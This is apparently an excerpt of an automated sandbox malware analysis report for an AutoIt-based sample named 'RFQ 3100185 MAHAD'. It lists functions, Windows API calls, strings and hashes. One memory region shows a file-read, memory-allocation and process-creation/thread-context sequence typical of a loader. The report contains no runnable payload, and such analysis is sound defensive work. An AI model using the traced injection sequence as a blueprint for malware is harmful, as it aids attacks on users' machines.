                                                            • Opcode ID: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                            • Instruction ID: 859bb525443780c92c95c473fe74374b1b6c1000133881176645065c64b778f9
                                                            • Opcode Fuzzy Hash: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                            • Instruction Fuzzy Hash: 3CF0DA716406D47AEB31676BAC0DE672E7DF7C6F24B00001EBA08A25B4C56548D9DAB1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1324 149c660-149c7af call 149a2b0 call 149c550 CreateFileW 1331 149c7b1 1324->1331 1332 149c7b6-149c7c6 1324->1332 1333 149c866-149c86b 1331->1333 1335 149c7c8 1332->1335 1336 149c7cd-149c7e7 VirtualAlloc 1332->1336 1335->1333 1337 149c7e9 1336->1337 1338 149c7eb-149c802 ReadFile 1336->1338 1337->1333 1339 149c804 1338->1339 1340 149c806-149c840 call 149c590 call 149b550 1338->1340 1339->1333 1345 149c85c-149c864 ExitProcess 1340->1345 1346 149c842-149c857 call 149c5e0 1340->1346 1345->1333 1346->1345
                                                            APIs
                                                              • Part of subcall function 0149C550: Sleep.KERNELBASE(000001F4), ref: 0149C561
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0149C7A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1291150986.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_149a000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 5LKG4V498YU9N8L8O9JA3QPEF
                                                            • API String ID: 2694422964-35354929
                                                            • Opcode ID: de1ed814e142588899d5c722a66fa9ac8e2d5711f76e8e3ed2cda0a4af3cc638
                                                            • Instruction ID: 19a5aba193410824c4686f8cca299188a694cf5b52765cf84de1748b4627523c
                                                            • Opcode Fuzzy Hash: de1ed814e142588899d5c722a66fa9ac8e2d5711f76e8e3ed2cda0a4af3cc638
                                                            • Instruction Fuzzy Hash: 22616070D04288DBEF11DBE4C854BEEBFB8AF15304F044199E648BB2C1D6B91B49CBA5
                                                            APIs
                                                            • _memset.LIBCMT ref: 007B522F
                                                            • _wcscpy.LIBCMT ref: 007B5283
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00823CB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 1053898822-1585850449
                                                            • Opcode ID: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                            • Instruction ID: d9fa9325e4da0d82f337d318e87ce71cced6e67be375724ed101a49141d7d23d
                                                            • Opcode Fuzzy Hash: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                            • Instruction Fuzzy Hash: E931EF71108744AFD721EB64EC4EFEE77E8BB44310F00451EF58982192EB78A688CB96
                                                            APIs
                                                              • Part of subcall function 007B41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                            • _free.LIBCMT ref: 008236B7
                                                            • _free.LIBCMT ref: 008236FE
                                                              • Part of subcall function 007BC833: __wsplitpath.LIBCMT ref: 007BC93E
                                                              • Part of subcall function 007BC833: _wcscpy.LIBCMT ref: 007BC953
                                                              • Part of subcall function 007BC833: _wcscat.LIBCMT ref: 007BC968
                                                              • Part of subcall function 007BC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 805182592-1757145024
                                                            • Opcode ID: 4636a4313baa74a82d4d81735b24ed63f9c8bc22b1e2539649aef86ac5ec2561
                                                            • Instruction ID: 0430b6e12abdef975b0c6f4ceacfe8c4c782943d337b0dafc609417e6d8b4e41
                                                            • Opcode Fuzzy Hash: 4636a4313baa74a82d4d81735b24ed63f9c8bc22b1e2539649aef86ac5ec2561
                                                            • Instruction Fuzzy Hash: 2B913C71910229EBCF04EFA4DC55AEDB7B4FF14310B104429F916E7291DB789A45CB50
                                                            APIs
                                                              • Part of subcall function 007B5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00871148,?,007B61FF,?,00000000,00000001,00000000), ref: 007B5392
                                                              • Part of subcall function 007B49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                            • _wcscat.LIBCMT ref: 00822D80
                                                            • _wcscat.LIBCMT ref: 00822DB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileModuleNameOpen
                                                            • String ID: \$\Include\
                                                            • API String ID: 3592542968-2640467822
                                                            • Opcode ID: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                            • Instruction ID: ab1e64950b6ff016ca8bbec05c50d4810e474525abd56c6035e853aec3066630
                                                            • Opcode Fuzzy Hash: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                            • Instruction Fuzzy Hash: 705150B1404344DBC314EF59E98999AB7F4FF59310B80452EF64CC3265EB38E688CB62
                                                            APIs
                                                            • __getstream.LIBCMT ref: 007D34FE
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 007D3539
                                                            • __wopenfile.LIBCMT ref: 007D3549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                            • String ID: <G
                                                            • API String ID: 1820251861-2138716496
                                                            • Opcode ID: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                            • Instruction ID: 1627f278913da6bd827b49b07a067db5ce6a8dd9cad05db74d05635de6e417ad
                                                            • Opcode Fuzzy Hash: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                            • Instruction Fuzzy Hash: B411E370A00206DEDB52BF70AC4667E36B4AF45390B158527E81ADB381EA3CCA1197B2
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007CD28B,SwapMouseButtons,00000004,?), ref: 007CD2BC
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2DD
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                            • Instruction ID: a9058e6122e909c926a675cf10229c2ce33886bb932e14530140769c5f7222ac
                                                            • Opcode Fuzzy Hash: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                            • Instruction Fuzzy Hash: 91112375611218FFDB208FA8DC84EAE7BB8EF44744F10486DA805D7210E635EE419B60
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0149BD0B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149BDA1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149BDC3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1291150986.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_149a000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction ID: a895fe4b23b59de9e2d8a2d2f45a507f7ef4b44462c80ed90d961df3f7619bfc
                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction Fuzzy Hash: 7A620F70A14258DBEB24CFA4C850BDEB776EF58300F1091A9D10DEB3A4E7769E81CB59
                                                            APIs
                                                              • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
                                                              • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
                                                              • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
                                                            • _free.LIBCMT ref: 007FC4DD
                                                            • _free.LIBCMT ref: 007FC4E4
                                                            • _free.LIBCMT ref: 007FC54F
                                                              • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                              • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                            • _free.LIBCMT ref: 007FC557
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 5855495d8b716de12843966f04efea6feebcbf0da52c17cc05b2843a1aa341a9
                                                            • Instruction ID: ea03251bef7a40280b2b3a399201f25beacdbc1048542cc1494f95f28b3423dc
                                                            • Opcode Fuzzy Hash: 5855495d8b716de12843966f04efea6feebcbf0da52c17cc05b2843a1aa341a9
                                                            • Instruction Fuzzy Hash: 53516BB1904218EFDB259F64DC85BEEBBB9EF48304F1000AEB25DA3341DB755A908F59
                                                            APIs
                                                            • _memset.LIBCMT ref: 007CEBB2
                                                              • Part of subcall function 007B51AF: _memset.LIBCMT ref: 007B522F
                                                              • Part of subcall function 007B51AF: _wcscpy.LIBCMT ref: 007B5283
                                                              • Part of subcall function 007B51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 007CEC07
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007CEC16
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00823C88
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: 865427fd685d652ccec3fd0d43df674d81f78e3a885e051c60b6917c150afe79
                                                            • Instruction ID: 1deb9dea46012148fcbfe307e01f3003f72618f3d3edc6c0db6f1616c50ade6d
                                                            • Opcode Fuzzy Hash: 865427fd685d652ccec3fd0d43df674d81f78e3a885e051c60b6917c150afe79
                                                            • Instruction Fuzzy Hash: F721AA70504794AFE7329B28DC59FE7BBECEB45308F04044DE69E96141C3786AC48B51
                                                            APIs
                                                            • _memset.LIBCMT ref: 00823725
                                                            • GetOpenFileNameW.COMDLG32 ref: 0082376F
                                                              • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                              • Part of subcall function 007B40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: efdf7b948a009ad7d0e648abd022b68d03e67a24930c9cf3713eaf9dcf84b76d
                                                            • Instruction ID: 41ed46a53c3a2099fdb95d302a253314d9264919701e74a9f2f9ccee32852f42
                                                            • Opcode Fuzzy Hash: efdf7b948a009ad7d0e648abd022b68d03e67a24930c9cf3713eaf9dcf84b76d
                                                            • Instruction Fuzzy Hash: 6F218471A10298ABCF019FD8D8497DE7BF9AF49304F00405AE505E7241DBB89A898F65
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 007FC72F
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007FC746
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 332b10de726cd7c875caa011fb3215a07b7d6d685f63d86d91549339eec05e2f
                                                            • Instruction ID: 73e01a62b08f157e4f8b41b7068138b660ae7437f4f2c16ae550dd78927dbfcb
                                                            • Opcode Fuzzy Hash: 332b10de726cd7c875caa011fb3215a07b7d6d685f63d86d91549339eec05e2f
                                                            • Instruction Fuzzy Hash: B5D05E7250030EABDF10ABA0EC0EF8B7B6CA700704F0005A07650E51B1DAB4E6998B54
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b819bae9668bcf613c6d1cdcfa5e9c13fc43d678bea597846133bceca762ad09
                                                            • Instruction ID: 14e794c9c4cd7d60ab0605becf62408b9d7070f00181850417fa7a10ecafbe0d
                                                            • Opcode Fuzzy Hash: b819bae9668bcf613c6d1cdcfa5e9c13fc43d678bea597846133bceca762ad09
                                                            • Instruction Fuzzy Hash: DAF169716043059FC720DF28C895B6AB7E5FF88314F14892DFA959B292D734E945CF82
                                                            APIs
                                                            • _memset.LIBCMT ref: 007B5022
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell__memset
                                                            • String ID:
                                                            • API String ID: 928536360-0
                                                            • Opcode ID: ce9dcd0b203f62ca37922d86c2e8de3f072bb3bcd7ba067bfbcf5bdbc7fed9df
                                                            • Instruction ID: 6b2c82e68a5e1f07273ec80dfbdec8d0cb5d6e2ea9bac2745a16e2be830d023b
                                                            • Opcode Fuzzy Hash: ce9dcd0b203f62ca37922d86c2e8de3f072bb3bcd7ba067bfbcf5bdbc7fed9df
                                                            • Instruction Fuzzy Hash: 6D314FB1504701CFD721EF38E8497DBBBE4FB49304F00092EE59E86251E775A984CBA6
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                              • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81E9
                                                              • Part of subcall function 007D81C2: __NMSG_WRITE.LIBCMT ref: 007D81F3
                                                            • __NMSG_WRITE.LIBCMT ref: 007D397A
                                                              • Part of subcall function 007D821F: GetModuleFileNameW.KERNEL32(00000000,00870312,00000104,00000000,00000001,00000000), ref: 007D82B1
                                                              • Part of subcall function 007D821F: ___crtMessageBoxW.LIBCMT ref: 007D835F
                                                              • Part of subcall function 007D1145: ___crtCorExitProcess.LIBCMT ref: 007D114B
                                                              • Part of subcall function 007D1145: ExitProcess.KERNEL32 ref: 007D1154
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            • RtlAllocateHeap.NTDLL(01240000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 718a751250bd395f38f9208a77a495dac581836d288aac87095e38437def5743
                                                            • Instruction ID: 79ea37c1d1503661a33aae19982724fe82de6e631b91c50a285b1c3a3b946a5a
                                                            • Opcode Fuzzy Hash: 718a751250bd395f38f9208a77a495dac581836d288aac87095e38437def5743
                                                            • Instruction Fuzzy Hash: BC019635245201EAE6553B34EC6AB2A737CAB81768B21012BF50996381DAFCED408672
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007FC385,?,?,?,?,?,00000004), ref: 007FC6F2
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007FC708
                                                            • CloseHandle.KERNEL32(00000000,?,007FC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC70F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 9511d1f43ba41b39fc806afe4d10ccdc947b2c2fc455913fc3b852602f5ce3e0
                                                            • Instruction ID: 79ed3c5cb731d2f15c32f2b8e2e7e29b23504e514fc1bd948ca92d92b093b182
                                                            • Opcode Fuzzy Hash: 9511d1f43ba41b39fc806afe4d10ccdc947b2c2fc455913fc3b852602f5ce3e0
                                                            • Instruction Fuzzy Hash: 63E08632140318B7D7212B54BC09FCE7B18BB45770F104510FB156A1E097B129119798
                                                            APIs
                                                            • _free.LIBCMT ref: 007FBB72
                                                              • Part of subcall function 007D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,007D7A85), ref: 007D1CB1
                                                              • Part of subcall function 007D1C9D: GetLastError.KERNEL32(00000000,?,007D7A85), ref: 007D1CC3
                                                            • _free.LIBCMT ref: 007FBB83
                                                            • _free.LIBCMT ref: 007FBB95
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                            • Instruction ID: 853ff41138141d13ccd477943c8cdcd45c3857c3f18c4aee212c72ae7fb37433
                                                            • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
